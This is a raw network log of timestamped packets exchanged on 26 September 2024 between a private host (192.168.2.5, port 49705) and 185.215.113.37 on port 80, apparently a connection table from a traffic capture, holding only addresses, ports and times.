Sep 26, 2024 21:14:14.369232893 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.369245052 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369256973 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369256973 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.369268894 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369277000 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.369282007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369292974 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369301081 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.369306087 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.369323969 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.369338036 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.370157957 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370170116 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370179892 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370196104 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370203018 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370208979 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370210886 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.370213985 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370220900 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370227098 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370229006 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.370233059 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370234966 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370239973 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370242119 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370244980 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370254040 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.370258093 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370270967 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370289087 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.370300055 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.370325089 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.370902061 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370913982 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.370950937 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.464636087 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.464695930 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.464726925 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.464790106 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.464818954 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.464818954 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.464818954 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.464822054 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.464842081 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.464859009 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.464893103 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.464893103 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.464930058 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.464942932 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465030909 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465065002 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465080023 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465110064 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465123892 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465173006 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465248108 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465301037 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465332985 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465333939 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465342045 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465373993 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465395927 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465429068 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465444088 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465464115 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465473890 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465509892 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465518951 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465564966 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465707064 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465739012 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465764999 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465773106 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465791941 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465806961 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465818882 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465847015 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465851068 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465883970 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465893030 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465919971 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.465928078 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.465965033 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466281891 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466315031 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466337919 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466347933 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466356993 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466382027 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466389894 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466415882 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466428041 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466450930 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466461897 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466485023 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466496944 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466519117 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466530085 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466552973 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466562986 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466587067 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466599941 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466622114 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466633081 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466656923 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466666937 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466691017 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466702938 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466723919 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466733932 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466768026 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.466769934 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.466818094 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467060089 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467093945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467111111 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467127085 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467137098 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467160940 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467170954 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467195034 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467206001 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467238903 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467251062 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467283964 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467295885 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467319012 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467329025 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467355013 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467364073 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467402935 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467627048 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467659950 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467680931 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467693090 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467705011 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467727900 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467741013 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467762947 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467772961 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467797041 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467804909 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467833042 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467854977 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467865944 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467876911 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467900991 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467912912 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467936993 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.467946053 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.467988968 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468220949 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468255043 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468277931 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468287945 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468303919 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468331099 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468358994 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468391895 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468405008 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468425989 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468439102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468461037 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468472958 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468494892 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468506098 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468529940 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468539953 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468564034 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468574047 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468600988 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468611956 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468635082 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468646049 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468669891 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468683004 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468703032 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468713999 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468736887 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468749046 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468771935 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468781948 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468806982 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468818903 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468842030 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468854904 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468880892 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.468887091 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.468928099 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469135046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469168901 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469182968 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469202995 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469211102 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469237089 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469249010 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469278097 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469289064 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469333887 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469333887 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469369888 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469381094 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469404936 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469414949 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469439030 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469449997 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469474077 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469485044 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469507933 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469518900 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469542980 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469552994 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469577074 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469588995 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469613075 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469623089 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469646931 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469656944 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469681025 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469691992 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469716072 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469724894 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469749928 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469763041 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469784975 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.469793081 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.469830036 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470145941 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470184088 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470196962 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470199108 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470223904 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470232010 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470257998 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470264912 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470268965 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470299959 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470309973 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470331907 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470349073 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470366955 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470375061 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470400095 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470412970 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470434904 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470441103 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470469952 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470479965 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470504999 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470516920 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470546961 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.470555067 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.470602036 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.555495977 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.555553913 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.555588007 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.555598974 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.555619955 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.555638075 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.555665970 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.555699110 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.555716038 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.555732965 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.555740118 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.555768013 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.555783987 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.555810928 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.555933952 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.555968046 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.555989027 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556001902 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556016922 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556047916 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556051970 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556101084 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556152105 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556184053 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556200981 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556221008 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556231976 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556233883 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556267023 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556267023 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556278944 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556302071 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556318045 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556334972 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556351900 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556371927 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556386948 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556421995 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556617975 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556651115 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556669950 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556684017 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556696892 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556729078 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556732893 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556762934 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556780100 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556796074 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556814909 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556828976 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556849957 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556868076 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.556873083 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.556925058 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557136059 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557183981 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557192087 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557219028 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557230949 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557252884 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557266951 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557298899 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557306051 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557332993 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557349920 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557368040 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557383060 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557416916 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557420015 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557454109 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557471991 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557506084 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557672977 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557708025 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557729959 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557740927 CEST	80	49705	185.215.113.37	192.168.2.5
Sep 26, 2024 21:14:14.557761908 CEST	49705	80	192.168.2.5	185.215.113.37
Sep 26, 2024 21:14:14.557775974 CEST	80	49705	185.215.113.37	192.168.2.5
